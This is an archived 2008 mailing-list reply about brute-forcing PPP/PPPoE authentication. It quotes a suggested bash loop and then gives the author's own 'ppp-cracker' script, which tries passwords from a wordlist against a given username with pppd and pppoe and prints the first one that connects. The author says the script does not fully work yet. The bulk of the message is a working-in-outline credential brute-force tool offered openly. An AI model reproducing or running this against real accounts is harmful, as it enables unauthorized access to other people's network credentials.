RE: PPP authentication brute-force attack?

From: Matheus Michels (matheusf_michels@hotmail.com)
Date: Tue Feb 12 2008 - 22:06:50 EST


> What about something like that (didn't try it):
>
> while read passwd; do
> pppd call pppd-options password "$passwd"
> if [ $? -eq 0 ]; then
> echo "Found password: $passwd"
> break
> fi
> done < /path/to/password-file
>
> where "pppd-options" is a file containing pppd's options, and
> "password-file" contains the passwords, one per line.
>
> You probably need the following options in "pppd-options":
>
> nodetach
> maxconnect 5
>

This is exactly what I wanted. I made this little script based on yours:

#!/bin/bash

SETSID=/usr/bin/setsid
PPPD=/usr/sbin/pppd
PPPOE=/usr/sbin/pppoe

PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 maxconnect 5"
PPPOE_OPTIONS="-I eth0"

PASSWORDS=/home/matheus/pass.txt

if test "$1" = "" ; then
    echo "$0: Usage: ppp-cracker user" >&2
    exit 1
fi

while read passwd; do
    $SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd"
    if [ $? -eq 0 ]; then
        echo "Found password: $passwd"
        break
    fi
done < $PASSWORDS

I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script is not functional yet. It authenticates and, some seconds later, exits with an input/output error. But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the script to work.

Thank you very much!


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:24 EDT